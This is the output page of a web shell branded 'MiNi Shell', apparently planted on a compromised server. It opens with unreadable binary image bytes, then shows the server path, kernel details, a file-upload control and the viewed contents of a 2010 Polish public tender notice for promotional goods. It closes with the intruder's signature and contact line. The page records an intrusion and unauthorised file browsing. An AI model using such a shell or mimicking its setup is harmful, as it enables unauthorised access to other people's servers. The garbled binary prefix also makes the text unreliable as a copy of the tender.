JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/288275-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie i dostawa 
a)	artykułów promocyjnych dla Mazowieckiego Samorządowego Centrum Doskonalenia Nauczycieli 
b)	artykułów promocyjnych na potrzeby realizacji projektu  Mazowieckie Centra Talentu i Kariery.</b><br>
<b>Numer ogłoszenia: 288275 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowieckie Samorządowe Centrum Doskonalenia Nauczycieli w Warszawie , ul. Świętojerska 9, 00-236 Warszawa, woj. mazowieckie, tel. 0-22 6353289, faks 0-22 8877828.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mscdn.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostawa 
a)	artykułów promocyjnych dla Mazowieckiego Samorządowego Centrum Doskonalenia Nauczycieli 
b)	artykułów promocyjnych na potrzeby realizacji projektu  Mazowieckie Centra Talentu i Kariery..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Kalendarz trójdzielny LUX z główką indywidualną	-	format całkowity po rozłożeniu: 765 x 335 mm
-	Składany do formatu 220 x 335 mm
-	Główka wypukła, rozmiar: 195 x 335 mm; druk 4+0 CMYK, lakier UV 1+0, sztancowana i kaszerowana, doklejana do plecków; projekt indywidualny
-	Kalendarium: dwujęzyczne (polsko - angielskie), numeracja tygodni, druk 2+0; papier offset 80 g; klejone w trzy oddzielne bloki
-	Reklama między kalendariami
-	Przeźroczysta opaska z przesuwanym okienkiem
-	Podkład - plecki: druk - CMYK + 0, bigowane, karton jednostronny 250 g
-	Reklama między kalendariami
-	Pakowany w kartonową kopertę - koperta sztancowana z kartonu i składana	1 000
2	Planer biurkowy	-	Format  (400 x 580 mm)
-	Projekt indywidualny
-	Druk na spad 4+0, CMYK
-	Papier offset 80 g
-	Objętość: 30 kartek + tekturowa podkładka	110
3	Teczka kartonowa na gumkę	-	Teczka kartonowa ze skrzydełkiem dolnym, bocznym i górnym (wewnętrzne skrzydła)
-	Zaopatrzona w elastyczną gumkę, przymocowaną na tylniej stronie, która umożliwia jej zamknięcie
-	Projekt indywidualny
-	Format  na dokumenty A4 
-	Grubość 10 mm
-	4/0 full kolor CMYK
-	Sztywny karton 300 g, dwustronnie bielony
-	Folia mat jednostronnie
-	Lakierowanie	4 000
4	Papier firmowy A3 uniwersalny	-	Papier offset 100 g
-	Druk na spad 4+0 CMYK
-	Projekt indywidualny	8 000
5	Papier firmowy A4 - wydziałowy	-	Papier offset 80 g
-	Druk na spad 4+0 CMYK
-	Mutacje adresowe (Siedlce, Płock, Warszawa, Ciechanów, Mińsk Mazowiecki, Ostrołęka, Radom)
-	Projekt indywidualny	20 000
6	Wizytówki firmowe	-	Kreda 270 g
-	Druk na spad 4+4 CMYK (druga strona - język angielski)
-	Drukowane seriami (nie wszystkie na raz) w zależności od potrzeb	10 000
7	Zestaw kartek samoprzylepnych	-	Zestaw karteczek w zamykanej oprawie
-	Okładka: 105 x 80 x 20 mm, druk: strona zewnętrzna i wewnętrzna  4 kolory CMYK oraz laminat (matowy)
-	Projekt indywidualny okładki i notesów
-	Notesy samoprzylepne druk offsetowy 4 kolory CMYK, 1 notes 100 x 75 mm, 96 kartek i 1 notes 50 x 75 mm, 24 kartki
-	5 neonowych znaczników w 5 kolorach,20 kartek	2 000 

8	Długopisy	-	Plastikowy, przyciskany, z klipem
-	Kolor: niebieski + chromowane elementy (przycisk, klip, końcówka)
-	Umieszczenie logo oraz nazwy na korpusie (1 kolor)
-	Kolor wkładu: niebieski	5 000
9	Torby papierowe - granatowe małe	-	Wymiary: 250 x 110 x 320 mm
-	Papier prążkowany
-	Torba zadrukowana w kolorze granatowym, nadruk 1+0 kol. Pantone, nadruk logo oraz adresu www.mscdn.edu.pl - z jednej strony torby,1 kolor biały
-	Uchwyt papierowy, skręcany, granatowy	2 000
10	Torby papierowe - granatowe	-	Wymiary: 310 x 120 x 410 mm
-	Papier prążkowany
-	Torba zadrukowana w kolorze granatowym, nadruk 1+0 kol. Pantone, nadruk logo oraz adresu www.mscdn.edu.pl - z jednej strony torby,1 kolor biały
-	Uchwyt papierowy, skręcany, granatowy	1 000
11	Pendrive	-	Pendrive o pojemności min. 2 Gb., typ złącza USB 2.0, z nadrukiem full color (nadruki dostosowane do wielkości urządzenia).
-	Opakowanie jednostkowe - pudełko z wytłoczką dopasowaną kształtem do pendrivea, zabezpieczające przed przemieszczaniem się pendrivea	200
12	Kalendarz książkowy A5	-	kalendarz książkowy w formacie A5  dzienny, oprawa ze skóry miękkiej i gładkiej, z tłoczonym logo MSCDN, bez registrów, papier chemois (kremowy), ok. 200 stron, kalendarium polskie+ inne, imieniny i święta, druk dwukolorowy, wykończenie oprawa szyta, zawiera notes na stałe, narożnik okrągły
-	wszyty zeszyt teleadresowy, zakładka	300


C. Szczegółowy opis  artykuły  promocyjne na potrzeby realizacji projektu                                 Mazowieckie Centra Talentu i Kariery.


Lp.	Rodzaj	Opis	Ilość nakład do
1	Torby	-	torba płócienna
-	z krótkimi uchwytami
-	kolor naturalny
-	wymiary 38 x 42 cm
Nadruk kolorowy:
-	logo projektu MCTiK i adres strony www
na dole torby umieszczone:
-	logo Programu Operacyjnego Kapitał Ludzki
-	Flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego
	300
2	Kalendarze kieszonkowe (listkowe)	-	kalendarz na rok 2011 o wymiarach szerokość ok. 8,5cm i wysokość 5,5cm (+/- 0,5cm)
-	zaokrąglone rogi
-	wielowarstwowy dwustronny karton graficzny 350 g
-	folia błyszcząca z dwóch stron
Kalendarz musi zawierać:
-	logo projektu MCTiK i adres strony www
-	logo Programu Operacyjnego Kapitał Ludzki
-	Flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego
-		1 000
3	Koszulki młodzieżowe
T-shirt 	-	materiał 100% bawełna
-	kolor biały
-	rozmiary: S, M, L	500
		-	nadruk kolorowy: logo projektu MCTiK i adres strony www lub wymiennie hasło projektu
Na koszulkach musi zostać umieszczone: 
-	logo Programu Operacyjnego Kapitał Ludzki
-	Flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego
	
4	Długopisy	-	Plastikowy,  automatyczny z wymiennym wkładem koloru niebieskiego, gumka pod palce, z klipem
-	Kolor: biały + chromowane elementy wykończenia (przycisk, klip, końcówka)
-	Umieszczenie logo projektu, strony www oraz nazwy na korpusie
Na długopisach musi zostać umieszczone: 
-	logo Programu Operacyjnego Kapitał Ludzki
-	Flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego
	2 200
5	Breloczki antystresy	-	Breloczek piłka antystresowa
-	Średnica min. 38mm
-	Kolor biały
-	Wykończenie metalowe
-	Nadruk logo projektu 
Na breloczkach musi zostać umieszczone: 
-	logo Programu Operacyjnego Kapitał Ludzki
-	Flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego

	1 500
6	Plakat A2	-	Druk wg załączonego projektu ze zmodyfikowaną treścią
Na dole na białym tle umieszczone:
-	logo Programu Operacyjnego Kapitał Ludzki
-	Flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego
-	podpis: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
-	logo MSCDN
-	papier błyszczący, kredowy
-	wydruk w pełnym kolorze, jednostronny	300.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie zada wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - w przypadku podmiotów składających ofertę wspólną każdy z podmiotów osobno.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.	Wykaz wykonanych dostaw materiałów promocyjnych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Szczegółowy opis przedmiotu zamówienia/formularz cenowy 2.	Formularz ofertowy  3.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów, w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość zmiany umowy w zakresie:
1)	wynagrodzenia należnego Wykonawcy - w przypadku zmiany przepisów dotyczących stawki podatku od towarów i usług od zamawianej usługi;
2)	terminu realizacji zamówienia - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za która żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należnego wykonania umowy zgodnie ze specyfikacją istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mscdn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mazowieckie Samorządowe Centrum Doskonalenia Nauczycieli 00-236 Warszawa, ul. Świętojerska 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 10:00, miejsce: Mazowieckie Samorządowe Centrum Doskonalenia Nauczycieli 00-236 Warszawa, ul. Świętojerska 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie częściowo finansowane ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com